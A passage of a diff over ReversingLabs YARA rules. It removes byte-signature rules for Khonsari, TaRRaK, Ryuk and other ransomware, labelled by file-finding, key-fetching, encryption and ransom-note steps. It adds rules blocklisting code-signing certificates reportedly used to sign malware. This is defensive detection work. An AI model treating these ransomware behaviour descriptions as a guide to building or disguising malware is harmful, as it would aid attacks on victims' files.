-            8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83
-            C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D
-            44 24 ?? 50 FF D6 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ??
-            50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B CB E8 ?? ??
-            ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24
-            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 83 C4 ?? 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 8B F0 89 74 24 ?? 83 FE ?? 74 ?? 57 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ??
-            ?? ?? FF D7 50 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 FF 35
-            ?? ?? ?? ?? FF D7 8B 7C 24 ?? 50 FF 35 ?? ?? ?? ?? 57 FF D6 57 FF 15 ?? ?? ?? ?? 8B
-            CB E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57 FF 35 ?? ?? ?? ??
-            8B F9 89 7D ?? FF D6 FF 35 ?? ?? ?? ?? 8B D8 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF
-            D6 3B C3 0F 84 ?? ?? ?? ?? 6A ?? 59 33 DB 89 4D ?? 8B C3 88 9C 05 ?? ?? ?? ?? 40 3D
-            ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 51 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 89 45 ?? 8A 84 0D ?? ?? ?? ?? 88 44 0D ??
-            41 83 F9 ?? 72 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 58 50 53 6A ?? 68 ?? ?? ?? ??
-            57 89 45 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 57 FF D6
-            8D 0C 47 83 E9 ?? 66 83 39 ?? 75 ?? FF 35 ?? ?? ?? ?? 2B CF 83 C1 ?? D1 F9 8D 04 4F
-            50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF 35 ?? ?? ?? ?? FF D6 FF 75 ?? 8B F0 FF
-            15 ?? ?? ?? ?? 3B C6 75 ?? 33 F6 46 EB ?? 8B 75 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ??
-            8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 33 F6 46 85 F6 74 ?? 8B 35
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-        }
-		$encrypt_files_p2 = {
-            53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF
-            75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 81 7D ?? ?? ?? ?? ?? 74 ?? E9 ?? ?? ?? ?? 6A ??
-            6A ?? 51 0F 57 C0 50 66 0F 13 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 2D ?? ?? ?? ?? 8B 35 ??
-            ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 DA ?? 89 45 ?? 8B 45 ?? 2D ?? ?? ?? ?? 89 55 ?? 89 45
-            ?? 8D 45 ?? 83 D9 ?? 89 45 ?? 89 4D ?? 6A ?? 6A ?? FF 70 ?? FF 30 53 FF D7 6A ?? 8D
-            45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D
-            55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A
-            ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8B
-            45 ?? 83 C0 ?? 83 6D ?? ?? 89 45 ?? 75 ?? 8B 7D ?? 0F 57 C0 6A ?? 6A ?? 66 0F 13 45
-            ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A
-            ?? 8D 45 ?? 50 53 FF D6 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF
-            D6 53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ??
-            ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 57 FF 15 ?? ??
-            ?? ?? 8B CE E8 ?? ?? ?? ?? 5F 5E 5B C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $search_processes ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "44:7f:44:91:21:b8:83:21:16:63:b7:b7:e2:ea:d8:68" and 1443052800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Khonsari : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Khonsari ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c3c64256-af1f-5a9d-8a59-8d72993bb8da"
-		date = "2022-01-27"
-		modified = "2022-01-27"
+		id = "77d6756b-e948-5771-9ec1-f5159b0e792c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Khonsari.yara#L1-L68"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16212-L16228"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f1003b7863215bcd8e5cdce8ce40551105fb668ea2b8ac765909f9fa5373e6ca"
+		logic_hash = "dcdfb78d4d779b1cabcdf5b2da1fa27aaa9faaed4d4967630ce45f30304fe227"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Khonsari"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
-            13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 0B
-            16 0C 2B ?? 07 08 9A 0D 09 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ??
-            ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 09
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 06 1B 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            06 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11
-            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            06 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 2D ?? 00 11
-            ?? 7E ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 72 ??
-            ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
-            ?? ?? ?? ?? DC DE ?? 26 DE ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ??
-            28 ?? ?? ?? ?? 26 2A
-        }
-		$get_key = {
-            73 ?? ?? ?? ?? 0A 06 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11
-            ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D
-            ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ??
-            ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 07 6F ??
-            ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11
-            ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A
-        }
-		$encrypt_files = {
-            28 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 6F ?? ?? ?? ?? 06 20
-            ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 6F ?? ??
-            ?? ?? 06 19 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 02 03 07 28 ?? ??
-            ?? ?? 0C DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $get_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "xlgames" and pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" and 1326796477 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Tarrak : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TaRRaK ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a783df87-0c9b-5868-9af0-c32b11e8b71b"
-		date = "2021-09-06"
-		modified = "2021-09-06"
+		id = "2fc1303f-e559-59ba-a1b9-b74a154d8805"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.TaRRaK.yara#L1-L96"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16230-L16246"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a8c4c4a501d94da94ae4a2e1eb2846e841249659be64dd45f46584885d000635"
+		logic_hash = "a563f1485ae8887c46f45d1366f676894c7db55954671825b37372f786ce0d3d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TaRRaK"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 73 ?? ?? ?? ?? 0D 09 08 28 ?? ?? ?? ?? 7D
-            ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ??
-            02 08 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ??
-            0A 16 0B 2B ?? 06 07 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 11 ?? 28 ?? ?? ?? ??
-            07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 2A
-        }
-		$encrypt_files_p2 = {
-            03 8E 69 17 59 0A 06 17 2F ?? 03 2A 03 06 95 0B 16 0D 1C 1F ?? 06 17 58 5B 58 13 ?? 2B
-            ?? 09 20 ?? ?? ?? ?? 58 0D 09 18 64 19 5F 13 ?? 16 13 ?? 2B ?? 03 11 ?? 17 58 95 0C 03
-            11 ?? 8F ?? ?? ?? ?? 25 4B 02 09 08 07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11
-            ?? 0B 11 ?? 17 58 13 ?? 11 ?? 06 32 ?? 03 16 95 0C 03 06 8F ?? ?? ?? ?? 25 4B 02 09 08
-            07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11 ?? 0B 16 11 ?? 25 17 59 13 ?? 32 ??
-            03 2A
-        }
-		$encrypt_files_p3 = {
-            05 1B 64 04 18 62 61 04 19 64 05 1A 62 61 58 03 04 61 0E ?? 0E ?? 19 5F 6A 0E ?? 6E 61
-            D4 95 05 61 58 61 2A
-        }
-		$encrypt_files_p4 = {
-            03 8E 2D ?? 03 2A 02 02 02 03 17 28 ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 16 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2A
-        }
-		$find_files_p1 = {
-            73 ?? ?? ?? ?? 25 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25
-            2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 2A
-        }
-		$find_files_p2 = {
-            73 ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1B 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F
-            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
-        }
-		$change_desktop = {
-            1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 17
-            8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 1F ?? 16
-            06 19 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A
-        }
-		$drop_ransom_note = {
-            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 2A 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 02 7B ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 0D 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 26 07 6F ??
-            ?? ?? ?? 26 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
-            2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ??
-            DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07 6F ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 06 28 ?? ?? ?? ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? DE ??
-            26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26
-            DE ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $change_desktop ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOG Co., Ltd." and pe.signatures [ i ] . serial == "66:e3:f0:b4:45:9f:15:ac:7f:2a:2b:44:99:0d:d7:09" and 1320288125 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ryuk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ryuk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "179c9277-0bdc-522a-a822-cf93febff408"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "de018b47-9fbd-590e-b3d1-b50029496718"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ryuk.yara#L1-L199"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16248-L16264"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bf93892b281be20917656e242cbb0f3b3694439556b7e5e40a424ba1aa909105"
+		logic_hash = "e6b6a90cf40283d2e4d2d9c5732a078c9f2f117e3639ab5c0dd6c5323cb7c9ff"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ryuk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
-            6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 55 ?? 52
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ??
-            ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13
-            45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 52 8B 45
-            ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 83 7D ?? ?? 77 ?? 81 7D
-            ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ??
-            6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ??
-            89 55 ?? 83 7D ?? ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 8B 4D ?? 51
-            8B 55 ?? 52 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52
-            50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 77
-            ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 73 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 83 7D ?? ?? 77 ?? 72
-            ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 6A
-            ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89
-            55 ?? EB ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 55 ??
-            52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D
-        }
-		$encrypt_files_p2 = {
-            77 ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 77 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8B 4D ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ??
-            83 7D ?? ?? 73 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D
-            ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F
-            86 ?? ?? ?? ?? 8B 4D ?? 81 E9 ?? ?? ?? ?? 89 4D ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ??
-            50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ??
-            89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ??
-            8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 0F BE 84 15
-            ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ?? 83 FA ?? 0F
-            85 ?? ?? ?? ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ??
-            0F BE 84 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ??
-            83 FA ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 8D ??
-            ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 55 ?? 52 8B 45 ??
